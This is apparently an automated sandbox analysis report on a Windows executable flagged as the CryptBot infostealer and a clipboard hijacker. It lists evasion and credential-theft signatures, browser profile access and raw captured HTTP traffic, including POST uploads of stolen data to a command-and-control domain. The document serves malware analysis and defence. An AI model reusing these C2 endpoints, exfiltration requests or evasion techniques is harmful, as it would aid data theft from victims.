Windows Analysis Report
95e1Fwp61u.exe

Overview

General Information

Sample name: 95e1Fwp61u.exe
renamed because original name is a hash value
Original sample name: 8d602240d09a31565069442e5d207e5b.exe
Analysis ID: 1579671
MD5: 8d602240d09a31565069442e5d207e5b
SHA1: 469166d01052bbbdbb3867c85386cb94c75f32e9
SHA256: d4bcdb537b596a65ac79a1ac9a7e580738e90a1d925230864e8399761f410d80
Tags: exeuser-abuse_ch
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

barindex
Source: 95e1Fwp61u.exe Avira: detected
Source: 95e1Fwp61u.exe Virustotal: Detection: 48% Perma Link
Source: 95e1Fwp61u.exe ReversingLabs: Detection: 60%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 95e1Fwp61u.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B415B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_00B415B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0D14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_6C0D14B0
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_6780c676-0
Source: 95e1Fwp61u.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 8_2_00B481E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0F0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1AF960h 8_2_6C0EEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0F4453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C1784A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0FC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0FE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 8_2_6C170730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0F0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 8_2_6C12A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0F0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C1AD014h] 8_2_6C1A4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C147D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C143840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 8_2_6C0FD974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C10BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C10BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C0FD504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_6C149600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 8_2_6C0FD674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1ADFF4h 8_2_6C143690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 8_2_6C0FD7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C173140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0EB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0FD2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C167350
Source: chrome.exe Memory has grown: Private usage: 1MB later: 26MB

Networking

barindex
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49739 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49740 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49750 -> 185.121.15.192:80
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 444353Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 33 35 30 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=4FTjuYfSOoCqkvt91734935029 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 461Content-Type: multipart/form-data; boundary=------------------------pZiPjwWi8BmauCX7BRDYphData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 5a 69 50 6a 77 57 69 38 42 6d 61 75 43 58 37 42 52 44 59 70 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 61 76 69 79 75 6e 65 72 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a f4 25 7a a7 37 fd b0 4c 31 d7 23 2c c5 10 04 b8 39 38 48 b3 c7 69 ad d7 6d 4b 1f 69 42 0c f0 7e e3 c8 ad 00 60 6a c4 43 e1 64 f4 00 1c 92 cf 25 a6 78 27 25 03 5f 72 10 16 1a 72 ed d1 97 3e 04 8d 4e e9 4f df d8 ae 5a c8 73 27 b0 28 e5 62 b9 c8 71 89 2d c8 06 c9 d7 44 f8 bb de 19 75 ac 62 a0 89 4b 23 16 d3 76 cc 61 af b6 ce 6a 29 92 79 ae 55 1b aa 5c 6d a4 b2 d1 35 67 69 e1 a7 f1 0d a0 9f 43 03 94 29 f0 24 6f b6 a0 36 1a 66 7c 11 44 e4 8a fb 18 9c 04 59 25 54 86 7c 65 1d e8 80 e7 31 75 df 80 3f c5 da 7d 3c 81 22 7e 1c 7e 34 c6 c1 be 04 70 e9 ea 50 9b 37 99 71 33 81 75 d4 28 d7 10 6c 76 9f 31 90 0c 40 11 97 8c 18 56 c7 fc 5d 99 97 ef 18 f8 f7 1b 08 e5 64 22 af d8 29 cf cd 3c f2 17 fa 85 07 94 7a e5 bd 1e d8 65 63 7f b3 50 db 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 5a 69 50 6a 77 57 69 38 42 6d 61 75 43 58 37 42 52 44 59 70 68 2d 2d 0d 0a Data Ascii: --------------------------pZiPjwWi8BmauCX7BRDYphContent-Disposition: form-data; name="file"; filename="Caviyuner.bin"Content-Type: application/octet-stream%z7L1#,98HimKiB~`jCd%x'%_rr>NOZs'(bq-DubK#vaj)yU\m5giC)$o6f|DY%T|e1u?}<"~~4pP7q3u(lv1@V]d")<zecP--------------------------pZiPjwWi8BmauCX7BRDYph--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 64344Content-Type: multipart/form-data; boundary=------------------------BxUR7dqvpxlyFEe8sZjs9yData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 42 78 55 52 37 64 71 76 70 78 6c 79 46 45 65 38 73 5a 6a 73 39 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 69 6c 75 64 6f 76 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 86 45 6a 82 3d 52 95 4e 2c 95 53 6f 72 c2 7d 75 60 b2 9e 46 5e a6 a4 db 4f c8 75 0d 74 03 48 9e 7c b7 1e ad cb d1 e8 0a 77 28 55 d9 d0 f1 ec ff 19 44 75 47 35 7c f6 55 0e 56 fb 23 0a 9f 38 04 a1 bd a3 61 69 4f e4 ec 69 7a 3d b4 9c b8 6a 48 eb 55 d0 da 4b a5 6d d4 6a 62 5d 6d f1 e8 f9 c4 3e 34 24 2d ba f7 0d 9f 0e 5f 71 d8 2a 84 e2 3f fe 2b 0a d0 1e 73 10 9a 8f c9 b6 cf e0 bb 48 3d 7a ec 20 82 fd ef 58 29 7d 00 8b a4 fa 82 d6 36 1f 1c 77 6f 46 04 cf d6 fb 14 44 03 19 dd 85 0d a6 4e 99 6f 65 6b 5f ff e5 d9 78 e7 b9 07 bb 77 8b 9e ae 1a 00 84 d6 a4 c2 b4 4a 1d b4 48 97 51 c0 db 08 13 c1 18 1d bd 5c 1c 18 fc 24 64 f7 d5 1c 45 43 96 11 7d cb c4 61 ef 06 48 e2 80 ca d2 37 1d c0 e2 95 78 d6 3a 81 b3 43 94 af 36 84 a2 a9 7e 45 4c c2 1b 02 48 2d a8 06 a2 37 01 ae 07 a7 75 dd 69 57 07 e6 4e c9 f1 22 4f 9c 11 63 72 c3 ce e3 0d bb eb d2 c3 64 43 cf 9f b9 fc bd 6e b1 46 eb ed 86 21 42 01 e8 b6 31 bf 7f ce f5 f2 16 49 b7 d7 74 9b df 0b 34 11 0f 37 81 1d 79 6d cb f5 b1 cc 9a ce c3 c9 9e 37 89 4a 88 4b e3 4a 71 5c 3b e5 e9 8d ad 92 d0 f8 a9 d7 cd 6d f2 17 85 26 fe 3d 63 35 00 86 9f 46 a1 2e 39 4d 27 24 31 ce cf fa 8d b5 69 fb b4 c2 bb b6 05 49 f7 35 43 94 62 e1 c5 eb cf 40 32 49 8a f8 b2 e0 d4 01 35 28 97 a8 3f b4 ee 72 4f ef 43 b5 6f 0c af b3 74 39 49 cf 40 59 d2 60 3a 7e d7 10 3c ac 90 b9 30 70 0a 5f 88 03 23 11 ee 36 ee 3f 85 d3 c8 9a a6 42 d8 99 5a f7 cd be 70 a4 25 1f 35 a1 29 3f 60 6c f8 c4 78 0f fe f3 3a 9b f9 70 e8 a8 55 db 14 7f 15 d9 6e a4 e1 6d 67 9f 84 50 8a fd 28 92 c7 e0 c6 e9 b8 a7 61 a3 fd ed d4 7b bb b8 10 ed dc bf ae 0c c1 04 d7 3c 7e ef 28 06 02 35 04 eb ce 34 2f c2 4c cf 80 eb 70 18 bc 2e 6d 28 e2 62 03 09 4a bb a6 4a 04 bd 06 ad 82 b2 79 f8 58 d5 86 af dd 86 23 91 b2 8d 6c ae 88 b2 21 e5 7e 00 12 da ac 32 f5 2a c6 88 30 78 bc 93 9c b8 77 24 7c f2 66 4b 98 2b 72 88 47 30 ab fe 5e 0d 8e ca 76 49 ad f7 e1 29 7f 6e a7 40 4c 00 81 b7 d1 7e 92 7b 26 4f de 1d 7a 32 81 71 8d b2 7f b2 48 00 55 ee 85 d2 05 59 35 9e 8e 9e 1c 03 5c 09 3d d6 70 2c 73 0e 90 39 99 88 70 7f ca 5c e1 a3 46 08 87 f8 8a 62 63 d4 e5 e7 17 c5 b6 e6 95 eb 7f 8e 87 34 1a 9b 0b bb db ff d2 2f 29 12 e7 2e 7d 90 4a c7 0e b5 eb 13 6a ce cd e3 d1 e2 c2 74 e2 df 73 83 a3 86 22 c7 de 3b ae 54 f4 48 21 ce 5b 3d a8 c5 ee d4 d1 2b f9 d1 7e 46 05 d4 b5 66 b9 5b c6 b8 38 17 55 de 77 23 9f 5a 28 7c 89 15 a5 8e 33 c7 b2 01 6a cd
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 27810Content-Type: multipart/form-data; boundary=------------------------1pZ1CehVr2lNM3bim1NL8YData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 70 5a 31 43 65 68 56 72 32 6c 4e 4d 33 62 69 6d 31 4e 4c 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 69 6b 65 71 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d5 fe 8e 8f 48 20 e4 c5 da 9a 4b 65 53 25 88 bc 9f e9 6b de 78 21 98 b6 1e c8 9f 06 a3 37 74 b7 04 cf 23 73 a7 39 ea b6 80 e6 fa 6c b8 0a b5 f5 8f 64 e5 fe 34 f6 bc 9b 43 8f 62 bf 8d bb cd 41 77 58 e0 00 59 e9 3e 9e 92 73 11 d5 52 61 12 6f 9b 4d 51 66 67 7e 71 e6 a6 39 57 21 c4 88 3c be 66 ca 66 23 84 bb 4c f4 cb 66 ed 80 b4 b5 16 7b 16 48 7d ef bf 3b c3 24 e1 d7 72 0d e2 c5 60 8e b4 6a 0f 6a 3e 31 14 ae 58 70 42 b1 a8 da 9e 64 b0 99 cd df 65 8d 24 ac b0 77 c7 9f 38 f6 47 84 a1 74 37 25 36 87 34 38 90 c6 06 84 4a 33 ea 76 ea 99 21 e2 07 3e 6d a5 ed bf 12 9c ee 59 63 77 be e9 67 a6 5b 17 3a bb 63 08 c7 eb 64 d8 f9 77 2e d5 89 74 48 34 4b fb ec 4c b6 e8 66 73 3b 5e 88 17 7c c1 85 00 e2 59 ce 1b f6 9c fa af 5b a4 9f 62 cb 2b ce 95 71 c8 d9 39 5d 87 5e 0f 90 19 a6 04 f2 71 dd 08 13 e0 51 66 9e 5e 8b a2 8e b3 68 e5 3d 9d b7 2f d2 9b 17 93 9a 72 e8 c5 6c 43 db aa eb 15 8c 2a df 5a d3 6b a2 60 d7 85 51 f6 a8 c6 45 f7 b4 de e2 52 25 8c 22 3e 08 df 60 1f 84 97 4e ce 6a 8e 7c b3 5d 13 3a a7 3f 32 5c 2e 27 97 3e 2d 6d 83 a8 5b d7 88 d3 13 8a c3 01 99 42 d0 35 ca f3 31 99 e6 e9 36 63 58 ba e0 81 43 2e 29 10 0c 87 3e f6 93 31 16 9b 91 ee 52 b3 86 5a f4 1f 1e d2 4d 87 da 84 6d 1a d6 8d c3 a8 30 fc 4a 16 0c d1 c5 4a 1b 99 d8 49 24 c2 91 f4 9a a8 26 44 b2 5b 37 21 a3 99 21 45 ea 26 02 56 db 14 5d d9 df 64 38 1c 2a 09 2b 71 b2 69 3c a8 f0 30 06 e1 9b 68 2c dd ad 2c f2 b8 13 9f 21 73 76 a0 48 48 29 97 39 13 80 13 48 45 50 ee 62 c1 5c 56 e0 a9 16 13 41 50 82 ea c9 b6 fd a9 42 86 fb d4 c3 5f c1 5f db 67 8a 87 ba bf 5a 3b b4 a1 69 56 f6 e2 ff 7e 56 98 4a 8c d6 96 7c ef 68 94 2d f5 38 4e ee 67 ab 22 9c db e2 fd 78 bb bf 2c ef 5c 32 30 45 e2 d7 66 38 ed f7 59 ab 42 0b a4 c8 aa 4d 32 9f b5 5b df d3 86 cb 2d f9 88 88 66 a2 d0 f8 6f a6 2f 27 68 fe fa 63 85 ba a6 18 95 42 b4 3e 33 b8 4e c1 2a f8 70 ec 62 45 d9 44 46 91 38 c0 2f 3f 83 c7 16 f5 96 52 ea 2a b6 ae c5 0b 12 2e 72 47 f1 ee 61 d9 1c 91 3b 51 97 88 9e 44 8a dd 38 17 ac 42 72 59 77 a5 e5 e8 d1 ad d8 d1 36 5f d4 81 09 51 07 f8 ad 4f 54 9c de 34 c1 fb c4 13 78 3d b4 88 7c 73 7a 8d 4e 47 85 fb bb 61 9d cf 49 cc 8a a5 f6 fc f2 7c 76 7f e1 ae 64 c0 9c 50 f6 29 2f 11 42 97 42 bc ab 84 1b da cb 45 1c 95 df 85 bb 86 19 85 ad d7 cf be 0d 1b a5 ca f1 e1 1c c1 bc f7 50 a5 02 4e 9e e7 c7 a7 fb 51 ea 3a 52 e2 76 51 ad 05 ea 69 5e cf 79 2e e3 bc df 30 85 a0 cd 15 0d 4a
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 34 46 54 6a 75 59 66 53 4f 6f 43 71 6b 76 74 39 31 37 33 34 39 33 35 30 32 39 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "4FTjuYfSOoCqkvt91734935029", "data": "Done2" }
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View IP Address: 98.85.100.80 98.85.100.80
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=4FTjuYfSOoCqkvt91734935029 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
